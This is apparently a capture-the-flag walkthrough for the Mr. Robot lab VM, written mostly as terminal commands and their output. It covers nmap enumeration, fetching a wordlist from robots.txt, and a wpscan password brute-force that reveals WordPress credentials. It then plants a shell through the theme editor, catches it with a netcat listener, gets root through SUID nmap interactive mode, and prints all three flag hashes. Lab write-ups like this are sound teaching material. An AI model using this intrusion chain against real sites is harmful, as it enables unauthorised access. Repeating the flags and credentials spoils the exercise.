Mr.Robot
Port recognition withnmap
┌──(root@ghost)-[/home/ghost]
└─# nmap --script=http-enum --min-rate 5000 mrobot.vuln -p- -v --open
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-19 12:56 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:56
Completed NSE at 12:56, 0.00s elapsed
Initiating ARP Ping Scan at 12:56
Scanning mrobot.vuln (10.0.2.20) [1 port]
Completed ARP Ping Scan at 12:56, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:56
Scanning mrobot.vuln (10.0.2.20) [65535 ports]
Discovered open port 443/tcp on 10.0.2.20
Discovered open port 80/tcp on 10.0.2.20
Completed SYN Stealth Scan at 12:57, 26.35s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.20.
Initiating NSE at 12:57
NSE Timing: About 50.00% done; ETC: 12:58 (0:00:38 remaining)
Completed NSE at 12:57, 40.71s elapsed
Nmap scan report for mrobot.vuln (10.0.2.20)
Host is up (0.00037s latency).
Not shown: 65532 filtered tcp ports (no-response), 1 closed tcp port (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
| http-enum:
| /admin/: Possible admin folder
| /admin/index.html: Possible admin folder
| /wp-login.php: Possible admin folder
| /robots.txt: Robots file
| /feed/: Wordpress version: 4.3.1
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
| /readme.html: Interesting, a readme.
| /0/: Potentially interesting folder
|_ /image/: Potentially interesting folder
443/tcp open https
| http-enum:
| /admin/: Possible admin folder
| /admin/index.html: Possible admin folder
| /wp-login.php: Possible admin folder
| /robots.txt: Robots file
| /feed/: Wordpress version: 4.3.1
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
| /readme.html: Interesting, a readme.
| /0/: Potentially interesting folder
|_ /image/: Potentially interesting folder
MAC Address: 08:00:27:FF:10:C8 (Oracle VirtualBox virtual NIC)
NSE: Script Post-scanning.
Initiating NSE at 12:57
Completed NSE at 12:57, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 67.31 seconds
Raw packets sent: 131089 (5.768MB) | Rcvd: 25 (1.080KB)
nmap reports two open ports 80 for http and 443 for https. Using nmap http-enum script drops some usefull folders
┌──(root@ghost)-[/home/ghost]
└─# curl http://mrobot.vuln/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
┌──(root@ghost)-[/home/ghost]
└─# curl http://mrobot.vuln/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9
┌──(root@ghost)-[/home/ghost]
└─# curl http://mrobot.vuln/fsocity.dic > fsocity.dic
We found the first flag and a wordlist. After trying some usernames manually in http://mrobot.vuln/wp-login we obtain elliot username
┌──(root@ghost)-[/home/ghost]
└─# wpscan -U elliot -P fsocity.dic --url http://mrobot.vuln/wp-login
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://mrobot.vuln/wp-login/ [10.0.2.20]
[+] Started: Mon Sep 19 13:12:43 2022
[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - elliot / ER28-0652
Trying elliot / ircs Time: 00:00:16 < > (1355 / 859516) 0.15% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: elliot, Password: ER28-0652
[+] Finished: Mon Sep 19 13:13:05 2022
[+] Requests Done: 1632
[+] Cached Requests: 47
[+] Data Sent: 545.548 KB
[+] Data Received: 5.774 MB
[+] Memory used: 211.41 MB
[+] Elapsed time: 00:00:21
After log in wordpress as elliot go to appearance/editor select custom-header.php place your socket shell there, press update file, set your listener and curl it in http://mrobot.vuln/wp-admin/theme-editor.php
┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.0.2.15] from mrobot.vuln [10.0.2.20] 36341
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
17:30:04 up 49 min, 0 users, load average: 0.00, 0.01, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty; pty.spawn('/bin/bash')"
daemon@linux:/$ find / -perm -u=s 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
daemon@linux:/$ /usr/local/bin/nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h for help
nmap> !sh
!sh
# find / "of-3.txt" 2>/dev/null | grep "of-3.txt"
/root/key-3-of-3.txt
/opt/bitnami/apps/wordpress/htdocs/key-1-of-3.txt
/home/robot/key-2-of-3.txt
# cat /home/robot/key-2-of-3.txt && cat /root/key-3-of-3.txt
822c73956184f694993bede3eb39f959
04787ddef27c3dee1ee161b21670b4e4